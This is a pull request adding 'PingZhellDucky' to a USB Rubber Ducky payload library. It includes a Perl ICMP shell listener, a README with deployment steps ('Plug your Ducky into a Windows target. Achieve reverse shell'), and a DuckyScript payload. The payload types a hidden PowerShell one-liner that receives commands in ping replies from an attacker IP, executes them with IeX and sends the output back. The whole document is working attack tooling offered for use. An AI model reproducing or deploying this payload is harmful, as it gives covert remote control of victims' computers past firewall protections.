Merge pull request #180 from 0iphor13/master

Uploaded PingZhellDucky

payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl

@@ -0,0 +1,74 @@
+#!/usr/bin/env perl
+#
+#  icmpsh - simple icmp command shell
+#  Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
+#  This program is free software: you can redistribute it and/or modify
+#  it under the terms of the GNU General Public License as published by
+#  the Free Software Foundation, either version 3 of the License, or
+#  (at your option) any later version.
+#
+#  This program is distributed in the hope that it will be useful,
+#  but WITHOUT ANY WARRANTY; without even the implied warranty of
+#  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+#  GNU General Public License for more details.
+#
+#  You should have received a copy of the GNU General Public License
+#  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+#
+#  Modified by 0iphor13 for PingZhellDucky
+#
+# 
+#
+#
+
+
+use strict;
+use IO::Socket;
+use NetPacket::IP;
+use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
+use Net::RawIP;
+use Fcntl;
+
+print "Loading PingZhellDucky...\n";
+
+# create raw socket
+my $sock = IO::Socket::INET->new(
+                Proto   => "ICMP",
+                Type    => SOCK_RAW,
+                Blocking => 1) or die "$!";
+
+# set stdin to non-blocking
+fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
+
+
+#Unnecessary print output - just for fun
+sleep(2);
+print ". .\n";
+sleep(1);
+print ". . .\n";
+sleep(1);
+print ". . . .";
+sleep(2);
+print "PingZhellDucky client ready!\n";
+my $input = '';
+while(1) {
+        if ($sock->recv(my $buffer, 4096, 0)) {
+                my $ip = NetPacket::IP->decode($buffer);
+                my $icmp = NetPacket::ICMP->decode($ip->{data});
+                if ($icmp->{type} == ICMP_ECHO) {
+                        # get identifier and sequencenumber
+                        my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
+
+                        # write data to stdout and read from stdin
+                        print $data;
+                        $input = <STDIN>;
+
+                        # compile and send response
+                        $icmp->{type} = ICMP_ECHOREPLY;
+                        $icmp->{data} = pack("SSa*", $ident, $seq, $input);
+                        my $raw = $icmp->encode();
+                        my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
+                        $sock->send($raw, 0, $addr) or die "$!\n";
+                }
+        }
+}

payloads/library/remote_access/PingZhellDucky/README.md

@@ -0,0 +1,68 @@
+**Title: PingZhellDucky**
+
+<p>Author: 0iphor13<br>
+OS: Windows & Unix<br>
+Version: 1.2<br>
+Requirements: DuckyScript 3.0, perl</p>
+
+**What is PingZhellDucky?**
+#
+*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
+*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
+*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
+*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
+*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
+*The server ICMP agent (PingZhellDucky.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellDucky input) and sends it commands to execute.*
+#
+After PingZhellCable and PingZhellBunny, PingZhellDucky released. But what is different? PZD gives you the option to set up the infrastructre when not used on a Windows machine (perl and elevated privs required).
+
+**Instruction Version 1:**
+
+With automatic setup:
+Define INSTALL and set it to TRUE & Leave CLIENTLINK with default or choose your own
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setupauto.png)
+
+Define the IP of your attacking machine between the quotes at the ATTACKER section
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
+
+Open up a terminal and put it into focus. Insert the Ducky into your non-Windows attack machine - wait for it to finish setup (Linux recommended - Perl required!)
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/setup.png)
+
+Start the client -> `perl PingZhellDucky.pl`
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
+
+<p>Plug your Ducky into a Windows target.<br>
+Achieve reverse shell.<br>
+   run away <3</p>
+
+**Instruction Version 2:**
+Without automatic setup:
+Define INSTALL and set it to FALSE
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/install.png)
+
+Upload PingZhellDucky.pl onto your attacking machine.
+Install dependencies, if needed:
+- IO::Socket
+- NetPacket::IP
+- NetPacket::ICMP
+
+Disable ICMP replies by the OS:
+    `sysctl -w net.ipv4.icmp_echo_ignore_all=1`
+
+Start the client -> `perl PingZhellDucky.pl`
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/Client.png)
+
+Define the IP of your attacking machine between the quotes at the ATTACKER section
+![alt text](https://github.com/0iphor13/usbrubberducky-payloads/blob/master/payloads/library/remote_access/PingZhellDucky/media/ip.png)
+
+<p>Plug your Ducky into a Windows target.<br>
+Achieve reverse shell.<br>
+   run away <3</p>
+
+
+Credit for DS 3.0 implentation and ideas:
+- Korben
+- bdamele
+- Nikhil Mittal
+- krabelize
+

payloads/library/remote_access/PingZhellDucky/payload.txt

@@ -0,0 +1,78 @@
+REM PingZhellDucky
+REM Version 1.2
+REM OS: Windows & Unix
+REM Author: 0iphor13
+REM Requirements: DuckScript 3.0, Perl
+
+REM       Getting remote access via ICMP or perform the required setup
+
+REM PASSIVE_WINDOWS_DETECT extension, made by Korben, to indentify the OS
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
+
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
+
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
+
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
+
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM     STRING HELLO WINDOWS!
+    REM ELSE
+    REM     STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+REM Configure your settings below:
+REM Insert the attacking IP between ''
+DEFINE ATTACKER '0.0.0.0'
+REM Set the default DELAY
+DEFINE WAIT 250
+REM Do you want to install the dependencies and set up the infratructre?
+REM Will trigger when not using Windows - Best use with Linux
+DEFINE INSTALL TRUE
+REM Link to the PingZhellDucky.pl client - Required for installation
+DEFINE CLIENTLINK https://raw.githubusercontent.com/0iphor13/usbrubberducky-payloads/master/payloads/library/remote_access/PingZhellDucky/PingZhellDucky.pl
+
+
+IF ($_OS == WINDOWS) THEN
+    DELAY 1500
+    GUI r
+    DELAY 500
+    STRINGLN powershell -NoP -NonI -w h
+    DELAY 500
+    STRING ;$Delay=5;$BufferSize=128;$ICMPDucky=New-Object System.Net.NetworkInformation.Ping;$PingDuck=New-Object System.Net.NetworkInformation.PingOptions;$PingDuck.DontFragment = $True;$QuackAttack = ([text.encoding]::ASCII).GetBytes('Ducky@PS '+(gl).Path+'> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null;while ($true){$QuackAttack=([text.encoding]::ASCII).GetBytes('');$reply=$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);$result=(IeX -Command $response 2>&1 | Out-String );$QuackAttack = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($QuackAttack.length/$BufferSize);$i = 0;
+    DELAY WAIT
+    STRINGLN if($QuackAttack.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $QuackAttack[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null;$i +=1;};$remainingindex=$QuackAttack.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $QuackAttack[($i*$BufferSize)..($QuackAttack.Length)];$ICMPDucky.Send( ATTACKER ,60 * 10000, $NGGYU2, $PingDuck) | Out-Null}}else{$ICMPDucky.Send( ATTACKER ,60 * 10000, $QuackAttack, $PingDuck) | Out-Null};$QuackAttack = ([text.encoding]::ASCII).GetBytes("`nDucky@PS " + (pwd).Path + '> ');$ICMPDucky.Send( ATTACKER ,60 * 1000, $QuackAttack, $PingDuck) | Out-Null}else{Start-Sleep -Seconds $Delay}}
+ELSE
+    IF INSTALL THEN
+        DELAY WAIT
+        STRINGLN echo "Setting up Infrastructre - Do not interact!"
+        DELAY 2000
+        STRINGLN cpan IO::Socket NetPacket::IP NetPacket::ICMP && wget CLIENTLINK && sysctl -w net.ipv4.icmp_echo_ignore_all=1 && echo "Setup complete!"
+    ELSE
+        STRING Please insert device into a Windows machine or change the settings!
+END_IF
+END_IF